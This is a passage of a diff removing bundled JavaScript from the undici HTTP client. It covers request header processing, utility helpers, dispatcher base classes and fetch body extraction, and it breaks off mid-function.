assert(!this.aborted) - assert(!this.completed) - - return this[kHandler].onUpgrade(statusCode, headers, socket) - } - - onComplete (trailers) { - this.onFinally() - - assert(!this.aborted) - - this.completed = true - if (channels.trailers.hasSubscribers) { - channels.trailers.publish({ request: this, trailers }) - } - - try { - return this[kHandler].onComplete(trailers) - } catch (err) { - // TODO (fix): This might be a bad idea? - this.onError(err) - } - } - - onError (error) { - this.onFinally() - - if (channels.error.hasSubscribers) { - channels.error.publish({ request: this, error }) - } - - if (this.aborted) { - return - } - this.aborted = true - - return this[kHandler].onError(error) - } - - onFinally () { - if (this.errorHandler) { - this.body.off('error', this.errorHandler) - this.errorHandler = null - } - - if (this.endHandler) { - this.body.off('end', this.endHandler) - this.endHandler = null - } - } - - // TODO: adjust to support H2 - addHeader (key, value) { - processHeader(this, key, value) - return this - } - - static [kHTTP1BuildRequest] (origin, opts, handler) { - // TODO: Migrate header parsing here, to make Requests - // HTTP agnostic - return new Request(origin, opts, handler) - } - - static [kHTTP2BuildRequest] (origin, opts, handler) { - const headers = opts.headers - opts = { ...opts, headers: null } - - const request = new Request(origin, opts, handler) - - request.headers = {} - - if (Array.isArray(headers)) { - if (headers.length % 2 !== 0) { - throw new InvalidArgumentError('headers array must be even') - } - for (let i = 0; i < headers.length; i += 2) { - processHeader(request, headers[i], headers[i + 1], true) - } - } else if (headers && typeof headers === 'object') { - const keys = Object.keys(headers) - for (let i = 0; i < keys.length; i++) { - const key = keys[i] - processHeader(request, key, headers[key], true) - } - } else if (headers != null) { - throw new InvalidArgumentError('headers must be an object or an array') - } - - return request - } - - static [kHTTP2CopyHeaders] (raw) { - const rawHeaders = raw.split('\r\n') - const headers = {} - - for (const header of rawHeaders) { - const [key, value] = header.split(': ') - - if (value == null || value.length === 0) continue - - if (headers[key]) headers[key] += `,${value}` - else headers[key] = value - } - - return headers - } -} - -function processHeaderValue (key, val, skipAppend) { - if (val && typeof val === 'object') { - throw new InvalidArgumentError(`invalid ${key} header`) - } - - val = val != null ? `${val}` : '' - - if (headerCharRegex.exec(val) !== null) { - throw new InvalidArgumentError(`invalid ${key} header`) - } - - return skipAppend ? val : `${key}: ${val}\r\n` -} - -function processHeader (request, key, val, skipAppend = false) { - if (val && (typeof val === 'object' && !Array.isArray(val))) { - throw new InvalidArgumentError(`invalid ${key} header`) - } else if (val === undefined) { - return - } - - if ( - request.host === null && - key.length === 4 && - key.toLowerCase() === 'host' - ) { - if (headerCharRegex.exec(val) !== null) { - throw new InvalidArgumentError(`invalid ${key} header`) - } - // Consumed by Client - request.host = val - } else if ( - request.contentLength === null && - key.length === 14 && - key.toLowerCase() === 'content-length' - ) { - request.contentLength = parseInt(val, 10) - if (!Number.isFinite(request.contentLength)) { - throw new InvalidArgumentError('invalid content-length header') - } - } else if ( - request.contentType === null && - key.length === 12 && - key.toLowerCase() === 'content-type' - ) { - request.contentType = val - if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) - else request.headers += processHeaderValue(key, val) - } else if ( - key.length === 17 && - key.toLowerCase() === 'transfer-encoding' - ) { - throw new InvalidArgumentError('invalid transfer-encoding header') - } else if ( - key.length === 10 && - key.toLowerCase() === 'connection' - ) { - const value = typeof val === 'string' ? val.toLowerCase() : null - if (value !== 'close' && value !== 'keep-alive') { - throw new InvalidArgumentError('invalid connection header') - } else if (value === 'close') { - request.reset = true - } - } else if ( - key.length === 10 && - key.toLowerCase() === 'keep-alive' - ) { - throw new InvalidArgumentError('invalid keep-alive header') - } else if ( - key.length === 7 && - key.toLowerCase() === 'upgrade' - ) { - throw new InvalidArgumentError('invalid upgrade header') - } else if ( - key.length === 6 && - key.toLowerCase() === 'expect' - ) { - throw new NotSupportedError('expect header not supported') - } else if (tokenRegExp.exec(key) === null) { - throw new InvalidArgumentError('invalid header key') - } else { - if (Array.isArray(val)) { - for (let i = 0; i < val.length; i++) { - if (skipAppend) { - if (request.headers[key]) request.headers[key] += `,${processHeaderValue(key, val[i], skipAppend)}` - else request.headers[key] = processHeaderValue(key, val[i], skipAppend) - } else { - request.headers += processHeaderValue(key, val[i]) - } - } - } else { - if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) - else request.headers += processHeaderValue(key, val) - } - } -} - -module.exports = Request - - -/***/ }), - -/***/ 2785: -/***/ ((module) => { - -module.exports = { - kClose: Symbol('close'), - kDestroy: Symbol('destroy'), - kDispatch: Symbol('dispatch'), - kUrl: Symbol('url'), - kWriting: Symbol('writing'), - kResuming: Symbol('resuming'), - kQueue: Symbol('queue'), - kConnect: Symbol('connect'), - kConnecting: Symbol('connecting'), - kHeadersList: Symbol('headers list'), - kKeepAliveDefaultTimeout: Symbol('default keep alive timeout'), - kKeepAliveMaxTimeout: Symbol('max keep alive timeout'), - kKeepAliveTimeoutThreshold: Symbol('keep alive timeout threshold'), - kKeepAliveTimeoutValue: Symbol('keep alive timeout'), - kKeepAlive: Symbol('keep alive'), - kHeadersTimeout: Symbol('headers timeout'), - kBodyTimeout: Symbol('body timeout'), - kServerName: Symbol('server name'), - kLocalAddress: Symbol('local address'), - kHost: Symbol('host'), - kNoRef: Symbol('no ref'), - kBodyUsed: Symbol('used'), - kRunning: Symbol('running'), - kBlocking: Symbol('blocking'), - kPending: Symbol('pending'), - kSize: Symbol('size'), - kBusy: Symbol('busy'), - kQueued: Symbol('queued'), - kFree: Symbol('free'), - kConnected: Symbol('connected'), - kClosed: Symbol('closed'), - kNeedDrain: Symbol('need drain'), - kReset: Symbol('reset'), - kDestroyed: Symbol.for('nodejs.stream.destroyed'), - kMaxHeadersSize: Symbol('max headers size'), - kRunningIdx: Symbol('running index'), - kPendingIdx: Symbol('pending index'), - kError: Symbol('error'), - kClients: Symbol('clients'), - kClient: Symbol('client'), - kParser: Symbol('parser'), - kOnDestroyed: Symbol('destroy callbacks'), - kPipelining: Symbol('pipelining'), - kSocket: Symbol('socket'), - kHostHeader: Symbol('host header'), - kConnector: Symbol('connector'), - kStrictContentLength: Symbol('strict content length'), - kMaxRedirections: Symbol('maxRedirections'), - kMaxRequests: Symbol('maxRequestsPerClient'), - kProxy: Symbol('proxy agent options'), - kCounter: Symbol('socket request counter'), - kInterceptors: Symbol('dispatch interceptors'), - kMaxResponseSize: Symbol('max response size'), - kHTTP2Session: Symbol('http2Session'), - kHTTP2SessionState: Symbol('http2Session state'), - kHTTP2BuildRequest: Symbol('http2 build request'), - kHTTP1BuildRequest: Symbol('http1 build request'), - kHTTP2CopyHeaders: Symbol('http2 copy headers'), - kHTTPConnVersion: Symbol('http connection version'), - kRetryHandlerDefaultRetry: Symbol('retry agent default retry'), - kConstruct: Symbol('constructable') -} - - -/***/ }), - -/***/ 3983: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const assert = __nccwpck_require__(9491) -const { kDestroyed, kBodyUsed } = __nccwpck_require__(2785) -const { IncomingMessage } = __nccwpck_require__(3685) -const stream = __nccwpck_require__(2781) -const net = __nccwpck_require__(1808) -const { InvalidArgumentError } = __nccwpck_require__(8045) -const { Blob } = __nccwpck_require__(4300) -const nodeUtil = __nccwpck_require__(3837) -const { stringify } = __nccwpck_require__(3477) - -const [nodeMajor, nodeMinor] = process.versions.node.split('.').map(v => Number(v)) - -function nop () {} - -function isStream (obj) { - return obj && typeof obj === 'object' && typeof obj.pipe === 'function' && typeof obj.on === 'function' -} - -// based on https://github.com/node-fetch/fetch-blob/blob/8ab587d34080de94140b54f07168451e7d0b655e/index.js#L229-L241 (MIT License) -function isBlobLike (object) { - return (Blob && object instanceof Blob) || ( - object && - typeof object === 'object' && - (typeof object.stream === 'function' || - typeof object.arrayBuffer === 'function') && - /^(Blob|File)$/.test(object[Symbol.toStringTag]) - ) -} - -function buildURL (url, queryParams) { - if (url.includes('?') || url.includes('#')) { - throw new Error('Query params cannot be passed when url already contains "?" or "#".') - } - - const stringified = stringify(queryParams) - - if (stringified) { - url += '?' + stringified - } - - return url -} - -function parseURL (url) { - if (typeof url === 'string') { - url = new URL(url) - - if (!/^https?:/.test(url.origin || url.protocol)) { - throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') - } - - return url - } - - if (!url || typeof url !== 'object') { - throw new InvalidArgumentError('Invalid URL: The URL argument must be a non-null object.') - } - - if (!/^https?:/.test(url.origin || url.protocol)) { - throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') - } - - if (!(url instanceof URL)) { - if (url.port != null && url.port !== '' && !Number.isFinite(parseInt(url.port))) { - throw new InvalidArgumentError('Invalid URL: port must be a valid integer or a string representation of an integer.') - } - - if (url.path != null && typeof url.path !== 'string') { - throw new InvalidArgumentError('Invalid URL path: the path must be a string or null/undefined.') - } - - if (url.pathname != null && typeof url.pathname !== 'string') { - throw new InvalidArgumentError('Invalid URL pathname: the pathname must be a string or null/undefined.') - } - - if (url.hostname != null && typeof url.hostname !== 'string') { - throw new InvalidArgumentError('Invalid URL hostname: the hostname must be a string or null/undefined.') - } - - if (url.origin != null && typeof url.origin !== 'string') { - throw new InvalidArgumentError('Invalid URL origin: the origin must be a string or null/undefined.') - } - - const port = url.port != null - ? url.port - : (url.protocol === 'https:' ? 443 : 80) - let origin = url.origin != null - ? url.origin - : `${url.protocol}//${url.hostname}:${port}` - let path = url.path != null - ? url.path - : `${url.pathname || ''}${url.search || ''}` - - if (origin.endsWith('/')) { - origin = origin.substring(0, origin.length - 1) - } - - if (path && !path.startsWith('/')) { - path = `/${path}` - } - // new URL(path, origin) is unsafe when `path` contains an absolute URL - // From https://developer.mozilla.org/en-US/docs/Web/API/URL/URL: - // If first parameter is a relative URL, second param is required, and will be used as the base URL. - // If first parameter is an absolute URL, a given second param will be ignored. - url = new URL(origin + path) - } - - return url -} - -function parseOrigin (url) { - url = parseURL(url) - - if (url.pathname !== '/' || url.search || url.hash) { - throw new InvalidArgumentError('invalid url') - } - - return url -} - -function getHostname (host) { - if (host[0] === '[') { - const idx = host.indexOf(']') - - assert(idx !== -1) - return host.substring(1, idx) - } - - const idx = host.indexOf(':') - if (idx === -1) return host - - return host.substring(0, idx) -} - -// IP addresses are not valid server names per RFC6066 -// > Currently, the only server names supported are DNS hostnames -function getServerName (host) { - if (!host) { - return null - } - - assert.strictEqual(typeof host, 'string') - - const servername = getHostname(host) - if (net.isIP(servername)) { - return '' - } - - return servername -} - -function deepClone (obj) { - return JSON.parse(JSON.stringify(obj)) -} - -function isAsyncIterable (obj) { - return !!(obj != null && typeof obj[Symbol.asyncIterator] === 'function') -} - -function isIterable (obj) { - return !!(obj != null && (typeof obj[Symbol.iterator] === 'function' || typeof obj[Symbol.asyncIterator] === 'function')) -} - -function bodyLength (body) { - if (body == null) { - return 0 - } else if (isStream(body)) { - const state = body._readableState - return state && state.objectMode === false && state.ended === true && Number.isFinite(state.length) - ? state.length - : null - } else if (isBlobLike(body)) { - return body.size != null ? body.size : null - } else if (isBuffer(body)) { - return body.byteLength - } - - return null -} - -function isDestroyed (stream) { - return !stream || !!(stream.destroyed || stream[kDestroyed]) -} - -function isReadableAborted (stream) { - const state = stream && stream._readableState - return isDestroyed(stream) && state && !state.endEmitted -} - -function destroy (stream, err) { - if (stream == null || !isStream(stream) || isDestroyed(stream)) { - return - } - - if (typeof stream.destroy === 'function') { - if (Object.getPrototypeOf(stream).constructor === IncomingMessage) { - // See: https://github.com/nodejs/node/pull/38505/files - stream.socket = null - } - - stream.destroy(err) - } else if (err) { - process.nextTick((stream, err) => { - stream.emit('error', err) - }, stream, err) - } - - if (stream.destroyed !== true) { - stream[kDestroyed] = true - } -} - -const KEEPALIVE_TIMEOUT_EXPR = /timeout=(\d+)/ -function parseKeepAliveTimeout (val) { - const m = val.toString().match(KEEPALIVE_TIMEOUT_EXPR) - return m ? parseInt(m[1], 10) * 1000 : null -} - -function parseHeaders (headers, obj = {}) { - // For H2 support - if (!Array.isArray(headers)) return headers - - for (let i = 0; i < headers.length; i += 2) { - const key = headers[i].toString().toLowerCase() - let val = obj[key] - - if (!val) { - if (Array.isArray(headers[i + 1])) { - obj[key] = headers[i + 1].map(x => x.toString('utf8')) - } else { - obj[key] = headers[i + 1].toString('utf8') - } - } else { - if (!Array.isArray(val)) { - val = [val] - obj[key] = val - } - val.push(headers[i + 1].toString('utf8')) - } - } - - // See https://github.com/nodejs/node/pull/46528 - if ('content-length' in obj && 'content-disposition' in obj) { - obj['content-disposition'] = Buffer.from(obj['content-disposition']).toString('latin1') - } - - return obj -} - -function parseRawHeaders (headers) { - const ret = [] - let hasContentLength = false - let contentDispositionIdx = -1 - - for (let n = 0; n < headers.length; n += 2) { - const key = headers[n + 0].toString() - const val = headers[n + 1].toString('utf8') - - if (key.length === 14 && (key === 'content-length' || key.toLowerCase() === 'content-length')) { - ret.push(key, val) - hasContentLength = true - } else if (key.length === 19 && (key === 'content-disposition' || key.toLowerCase() === 'content-disposition')) { - contentDispositionIdx = ret.push(key, val) - 1 - } else { - ret.push(key, val) - } - } - - // See https://github.com/nodejs/node/pull/46528 - if (hasContentLength && contentDispositionIdx !== -1) { - ret[contentDispositionIdx] = Buffer.from(ret[contentDispositionIdx]).toString('latin1') - } - - return ret -} - -function isBuffer (buffer) { - // See, https://github.com/mcollina/undici/pull/319 - return buffer instanceof Uint8Array || Buffer.isBuffer(buffer) -} - -function validateHandler (handler, method, upgrade) { - if (!handler || typeof handler !== 'object') { - throw new InvalidArgumentError('handler must be an object') - } - - if (typeof handler.onConnect !== 'function') { - throw new InvalidArgumentError('invalid onConnect method') - } - - if (typeof handler.onError !== 'function') { - throw new InvalidArgumentError('invalid onError method') - } - - if (typeof handler.onBodySent !== 'function' && handler.onBodySent !== undefined) { - throw new InvalidArgumentError('invalid onBodySent method') - } - - if (upgrade || method === 'CONNECT') { - if (typeof handler.onUpgrade !== 'function') { - throw new InvalidArgumentError('invalid onUpgrade method') - } - } else { - if (typeof handler.onHeaders !== 'function') { - throw new InvalidArgumentError('invalid onHeaders method') - } - - if (typeof handler.onData !== 'function') { - throw new InvalidArgumentError('invalid onData method') - } - - if (typeof handler.onComplete !== 'function') { - throw new InvalidArgumentError('invalid onComplete method') - } - } -} - -// A body is disturbed if it has been read from and it cannot -// be re-used without losing state or data. -function isDisturbed (body) { - return !!(body && ( - stream.isDisturbed - ? stream.isDisturbed(body) || body[kBodyUsed] // TODO (fix): Why is body[kBodyUsed] needed? - : body[kBodyUsed] || - body.readableDidRead || - (body._readableState && body._readableState.dataEmitted) || - isReadableAborted(body) - )) -} - -function isErrored (body) { - return !!(body && ( - stream.isErrored - ? stream.isErrored(body) - : /state: 'errored'/.test(nodeUtil.inspect(body) - ))) -} - -function isReadable (body) { - return !!(body && ( - stream.isReadable - ? stream.isReadable(body) - : /state: 'readable'/.test(nodeUtil.inspect(body) - ))) -} - -function getSocketInfo (socket) { - return { - localAddress: socket.localAddress, - localPort: socket.localPort, - remoteAddress: socket.remoteAddress, - remotePort: socket.remotePort, - remoteFamily: socket.remoteFamily, - timeout: socket.timeout, - bytesWritten: socket.bytesWritten, - bytesRead: socket.bytesRead - } -} - -async function * convertIterableToBuffer (iterable) { - for await (const chunk of iterable) { - yield Buffer.isBuffer(chunk) ? chunk : Buffer.from(chunk) - } -} - -let ReadableStream -function ReadableStreamFrom (iterable) { - if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - if (ReadableStream.from) { - return ReadableStream.from(convertIterableToBuffer(iterable)) - } - - let iterator - return new ReadableStream( - { - async start () { - iterator = iterable[Symbol.asyncIterator]() - }, - async pull (controller) { - const { done, value } = await iterator.next() - if (done) { - queueMicrotask(() => { - controller.close() - }) - } else { - const buf = Buffer.isBuffer(value) ? value : Buffer.from(value) - controller.enqueue(new Uint8Array(buf)) - } - return controller.desiredSize > 0 - }, - async cancel (reason) { - await iterator.return() - } - }, - 0 - ) -} - -// The chunk should be a FormData instance and contains -// all the required methods. -function isFormDataLike (object) { - return ( - object && - typeof object === 'object' && - typeof object.append === 'function' && - typeof object.delete === 'function' && - typeof object.get === 'function' && - typeof object.getAll === 'function' && - typeof object.has === 'function' && - typeof object.set === 'function' && - object[Symbol.toStringTag] === 'FormData' - ) -} - -function throwIfAborted (signal) { - if (!signal) { return } - if (typeof signal.throwIfAborted === 'function') { - signal.throwIfAborted() - } else { - if (signal.aborted) { - // DOMException not available < v17.0.0 - const err = new Error('The operation was aborted') - err.name = 'AbortError' - throw err - } - } -} - -function addAbortListener (signal, listener) { - if ('addEventListener' in signal) { - signal.addEventListener('abort', listener, { once: true }) - return () => signal.removeEventListener('abort', listener) - } - signal.addListener('abort', listener) - return () => signal.removeListener('abort', listener) -} - -const hasToWellFormed = !!String.prototype.toWellFormed - -/** - * @param {string} val - */ -function toUSVString (val) { - if (hasToWellFormed) { - return `${val}`.toWellFormed() - } else if (nodeUtil.toUSVString) { - return nodeUtil.toUSVString(val) - } - - return `${val}` -} - -// Parsed accordingly to RFC 9110 -// https://www.rfc-editor.org/rfc/rfc9110#field.content-range -function parseRangeHeader (range) { - if (range == null || range === '') return { start: 0, end: null, size: null } - - const m = range ? range.match(/^bytes (\d+)-(\d+)\/(\d+)?$/) : null - return m - ? { - start: parseInt(m[1]), - end: m[2] ? parseInt(m[2]) : null, - size: m[3] ? parseInt(m[3]) : null - } - : null -} - -const kEnumerableProperty = Object.create(null) -kEnumerableProperty.enumerable = true - -module.exports = { - kEnumerableProperty, - nop, - isDisturbed, - isErrored, - isReadable, - toUSVString, - isReadableAborted, - isBlobLike, - parseOrigin, - parseURL, - getServerName, - isStream, - isIterable, - isAsyncIterable, - isDestroyed, - parseRawHeaders, - parseHeaders, - parseKeepAliveTimeout, - destroy, - bodyLength, - deepClone, - ReadableStreamFrom, - isBuffer, - validateHandler, - getSocketInfo, - isFormDataLike, - buildURL, - throwIfAborted, - addAbortListener, - parseRangeHeader, - nodeMajor, - nodeMinor, - nodeHasAutoSelectFamily: nodeMajor > 18 || (nodeMajor === 18 && nodeMinor >= 13), - safeHTTPMethods: ['GET', 'HEAD', 'OPTIONS', 'TRACE'] -} - - -/***/ }), - -/***/ 4839: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Dispatcher = __nccwpck_require__(412) -const { - ClientDestroyedError, - ClientClosedError, - InvalidArgumentError -} = __nccwpck_require__(8045) -const { kDestroy, kClose, kDispatch, kInterceptors } = __nccwpck_require__(2785) - -const kDestroyed = Symbol('destroyed') -const kClosed = Symbol('closed') -const kOnDestroyed = Symbol('onDestroyed') -const kOnClosed = Symbol('onClosed') -const kInterceptedDispatch = Symbol('Intercepted Dispatch') - -class DispatcherBase extends Dispatcher { - constructor () { - super() - - this[kDestroyed] = false - this[kOnDestroyed] = null - this[kClosed] = false - this[kOnClosed] = [] - } - - get destroyed () { - return this[kDestroyed] - } - - get closed () { - return this[kClosed] - } - - get interceptors () { - return this[kInterceptors] - } - - set interceptors (newInterceptors) { - if (newInterceptors) { - for (let i = newInterceptors.length - 1; i >= 0; i--) { - const interceptor = this[kInterceptors][i] - if (typeof interceptor !== 'function') { - throw new InvalidArgumentError('interceptor must be an function') - } - } - } - - this[kInterceptors] = newInterceptors - } - - close (callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - this.close((err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (this[kDestroyed]) { - queueMicrotask(() => callback(new ClientDestroyedError(), null)) - return - } - - if (this[kClosed]) { - if (this[kOnClosed]) { - this[kOnClosed].push(callback) - } else { - queueMicrotask(() => callback(null, null)) - } - return - } - - this[kClosed] = true - this[kOnClosed].push(callback) - - const onClosed = () => { - const callbacks = this[kOnClosed] - this[kOnClosed] = null - for (let i = 0; i < callbacks.length; i++) { - callbacks[i](null, null) - } - } - - // Should not error. - this[kClose]() - .then(() => this.destroy()) - .then(() => { - queueMicrotask(onClosed) - }) - } - - destroy (err, callback) { - if (typeof err === 'function') { - callback = err - err = null - } - - if (callback === undefined) { - return new Promise((resolve, reject) => { - this.destroy(err, (err, data) => { - return err ? /* istanbul ignore next: should never error */ reject(err) : resolve(data) - }) - }) - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (this[kDestroyed]) { - if (this[kOnDestroyed]) { - this[kOnDestroyed].push(callback) - } else { - queueMicrotask(() => callback(null, null)) - } - return - } - - if (!err) { - err = new ClientDestroyedError() - } - - this[kDestroyed] = true - this[kOnDestroyed] = this[kOnDestroyed] || [] - this[kOnDestroyed].push(callback) - - const onDestroyed = () => { - const callbacks = this[kOnDestroyed] - this[kOnDestroyed] = null - for (let i = 0; i < callbacks.length; i++) { - callbacks[i](null, null) - } - } - - // Should not error. - this[kDestroy](err).then(() => { - queueMicrotask(onDestroyed) - }) - } - - [kInterceptedDispatch] (opts, handler) { - if (!this[kInterceptors] || this[kInterceptors].length === 0) { - this[kInterceptedDispatch] = this[kDispatch] - return this[kDispatch](opts, handler) - } - - let dispatch = this[kDispatch].bind(this) - for (let i = this[kInterceptors].length - 1; i >= 0; i--) { - dispatch = this[kInterceptors][i](dispatch) - } - this[kInterceptedDispatch] = dispatch - return dispatch(opts, handler) - } - - dispatch (opts, handler) { - if (!handler || typeof handler !== 'object') { - throw new InvalidArgumentError('handler must be an object') - } - - try { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('opts must be an object.') - } - - if (this[kDestroyed] || this[kOnDestroyed]) { - throw new ClientDestroyedError() - } - - if (this[kClosed]) { - throw new ClientClosedError() - } - - return this[kInterceptedDispatch](opts, handler) - } catch (err) { - if (typeof handler.onError !== 'function') { - throw new InvalidArgumentError('invalid onError method') - } - - handler.onError(err) - - return false - } - } -} - -module.exports = DispatcherBase - - -/***/ }), - -/***/ 412: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const EventEmitter = __nccwpck_require__(2361) - -class Dispatcher extends EventEmitter { - dispatch () { - throw new Error('not implemented') - } - - close () { - throw new Error('not implemented') - } - - destroy () { - throw new Error('not implemented') - } -} - -module.exports = Dispatcher - - -/***/ }), - -/***/ 1472: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Busboy = __nccwpck_require__(727) -const util = __nccwpck_require__(3983) -const { - ReadableStreamFrom, - isBlobLike, - isReadableStreamLike, - readableStreamClose, - createDeferredPromise, - fullyReadBody -} = __nccwpck_require__(2538) -const { FormData } = __nccwpck_require__(2015) -const { kState } = __nccwpck_require__(5861) -const { webidl } = __nccwpck_require__(1744) -const { DOMException, structuredClone } = __nccwpck_require__(1037) -const { Blob, File: NativeFile } = __nccwpck_require__(4300) -const { kBodyUsed } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { isErrored } = __nccwpck_require__(3983) -const { isUint8Array, isArrayBuffer } = __nccwpck_require__(9830) -const { File: UndiciFile } = __nccwpck_require__(8511) -const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) - -let ReadableStream = globalThis.ReadableStream - -/** @type {globalThis['File']} */ -const File = NativeFile ?? UndiciFile -const textEncoder = new TextEncoder() -const textDecoder = new TextDecoder() - -// https://fetch.spec.whatwg.org/#concept-bodyinit-extract -function extractBody (object, keepalive = false) { - if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - // 1. Let stream be null. - let stream = null - - // 2. If object is a ReadableStream object, then set stream to object. - if (object instanceof ReadableStream) { - stream = object - } else if (isBlobLike(object)) { - // 3. Otherwise, if object is a Blob object, set stream to the - // result of running object’s get stream. - stream = object.stream() - } else { - // 4. Otherwise, set stream to a new ReadableStream object, and set - // up stream. - stream = new ReadableStream({ - async pull (controller) { - controller.enqueue( - typeof source === 'string' ? textEncoder.encode(source) : source - ) - queueMicrotask(() => readableStreamClose(controller)) - }, - start () {}, - type: undefined - }) - } - - // 5. Assert: stream is a ReadableStream object. - assert(isReadableStreamLike(stream)) - - // 6. Let action be null. - let action = null - - // 7. Let source be null. - let source = null - - // 8. Let length be null. - let length = null - - // 9. Let type be null. - let type = null - - // 10. Switch on object: - if (typeof object === 'string') { - // Set source to the UTF-8 encoding of object. - // Note: setting source to a Uint8Array here breaks some mocking assumptions. - source = object - - // Set type to `text/plain;charset=UTF-8`. - type = 'text/plain;charset=UTF-8' - } else if (object instanceof URLSearchParams) { - // URLSearchParams - - // spec says to run application/x-www-form-urlencoded on body.list - // this is implemented in Node.js as apart of an URLSearchParams instance toString method - // See: https://github.com/nodejs/node/blob/e46c680bf2b211bbd52cf959ca17ee98c7f657f5/lib/internal/url.js#L490 - // and https://github.com/nodejs/node/blob/e46c680bf2b211bbd52cf959ca17ee98c7f657f5/lib/internal/url.js#L1100 - - // Set source to the result of running the application/x-www-form-urlencoded serializer with object’s list. - source = object.toString() - - // Set type to `application/x-www-form-urlencoded;charset=UTF-8`. - type = 'application/x-www-form-urlencoded;charset=UTF-8' - } else if (isArrayBuffer(object)) { - // BufferSource/ArrayBuffer - - // Set source to a copy of the bytes held by object. - source = new Uint8Array(object.slice()) - } else if (ArrayBuffer.isView(object)) { - // BufferSource/ArrayBufferView - - // Set source to a copy of the bytes held by object. - source = new Uint8Array(object.buffer.slice(object.byteOffset, object.byteOffset + object.byteLength)) - } else if (util.isFormDataLike(object)) { - const boundary = `----formdata-undici-0${`${Math.floor(Math.random() * 1e11)}`.padStart(11, '0')}` - const prefix = `--${boundary}\r\nContent-Disposition: form-data` - - /*! formdata-polyfill. MIT License. Jimmy Wärting */ - const escape = (str) => - str.replace(/\n/g, '%0A').replace(/\r/g, '%0D').replace(/"/g, '%22') - const normalizeLinefeeds = (value) => value.replace(/\r?\n|\r/g, '\r\n') - - // Set action to this step: run the multipart/form-data - // encoding algorithm, with object’s entry list and UTF-8. - // - This ensures that the body is immutable and can't be changed afterwords - // - That the content-length is calculated in advance. - // - And that all parts are pre-encoded and ready to be sent. - - const blobParts = [] - const rn = new Uint8Array([13, 10]) // '\r\n' - length = 0 - let hasUnknownSizeValue = false - - for (const [name, value] of object) { - if (typeof value === 'string') { - const chunk = textEncoder.encode(prefix + - `; name="${escape(normalizeLinefeeds(name))}"` + - `\r\n\r\n${normalizeLinefeeds(value)}\r\n`) - blobParts.push(chunk) - length += chunk.byteLength - } else { - const chunk = textEncoder.encode(`${prefix}; name="${escape(normalizeLinefeeds(name))}"` + - (value.name ? `; filename="${escape(value.name)}"` : '') + '\r\n' + - `Content-Type: ${ - value.type || 'application/octet-stream' - }\r\n\r\n`) - blobParts.push(chunk, value, rn) - if (typeof value.size === 'number') { - length += chunk.byteLength + value.size + rn.byteLength - } else { - hasUnknownSizeValue = true - } - } - } - - const chunk = textEncoder.encode(`--${boundary}--`) - blobParts.push(chunk) - length += chunk.byteLength - if (hasUnknownSizeValue) { - length = null - } - - // Set source to object. - source = object - - action = async function * () { - for (const part of blobParts) { - if (part.stream) { - yield * part.stream() - } else { - yield part - } - } - } - - // Set type to `multipart/form-data; boundary=`, - // followed by the multipart/form-data boundary string generated - // by the multipart/form-data encoding algorithm. - type = 'multipart/form-data; boundary=' + boundary - } else if (isBlobLike(object)) { - // Blob - - // Set source to object. - source = object - - // Set length to object’s size. - length = object.size - - // If object’s type attribute is not the empty byte sequence, set - // type to its value. - if (object.type) { - type = object.type - } - } else if (typeof object[Symbol.asyncIterator] === 'function') { - // If keepalive is true, then throw a TypeError. - if (keepalive) { - throw new TypeError('keepalive') - } - - // If object is disturbed or locked, then throw a TypeError. - if (util.isDisturbed(object) || object.locked) { - throw new TypeError( - 'Response body object should not be disturbed or locked' - ) - } - - stream = - object instanceof ReadableStream ? object : ReadableStreamFrom(object) - } - - // 11. If source is a byte sequence, then set action to a - // step that returns source and length to source’s length. - if (typeof source === 'string' || util.isBuffer(source)) { - length = Buffer.byteLength(source) - } - - // 12. If action is non-null, then run these steps in in parallel: - if (action != null) { - // Run action. - let iterator - stream = new ReadableStream({ - async start () { - iterator = action(object)[Symbol.asyncIterator]() - }, - async pull (controller) { - const { value, done } = await iterator.next() - if (done) { - // When running action is done, close stream. - queueMicrotask(() => { - controller.close() - }) - } else { - // Whenever one or more bytes are available and stream is not errored, - // enqueue a Uint8Array wrapping an ArrayBuffer containing the available - // bytes into stream. - if (!isErrored(stream)) { - controller.enqueue(new Uint8Array(value)) - } - } - return controller.desiredSize > 0 - }, - async cancel (reason) { - await iterator.return() - }, - type: undefined - }) - } - - // 13. Let body be a body whose stream is stream, source is source, - // and length is length. - const body = { stream, source, length } - - // 14. Return (body, type). - return [body, type] -} - -// https://fetch.spec.whatwg.org/#bodyinit-safely-extract -function safelyExtractBody (object, keepalive = false) { - if (!ReadableStream) { - // istanbul ignore next - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - // To safely extract a body and a `Content-Type` value from - // a byte sequence or BodyInit object object, run these steps: - - // 1. If object is a ReadableStream object, then: - if (object instanceof ReadableStream) { - // Assert: object is neither disturbed nor locked. - // istanbul ignore next - assert(!util.isDisturbed(object), 'The body has already been consumed.') - // istanbul ignore next - assert(!object.locked, 'The stream is locked.') - } - - // 2. Return the results of extracting object. - return extractBody(object, keepalive) -} - -function cloneBody (body) { - // To clone a body body, run these steps: - - // https://fetch.spec.whatwg.org/#concept-body-clone - - // 1. Let « out1, out2 » be the result of teeing body’s stream. - const [out1, out2] = body.stream.tee() - const out2Clone = structuredClone(out2, { transfer: [out2] }) - // This, for whatever reasons, unrefs out2Clone which allows - // the process to exit by itself. - const [, finalClone] = out2Clone.tee() - - // 2. Set body’s stream to out1. - body.stream = out1 - - // 3. Return a body whose stream is out2 and other members are copied from body. - return { - stream: finalClone, - length: body.length, - source: body.source - } -} - -async function * consumeBody (body) { - 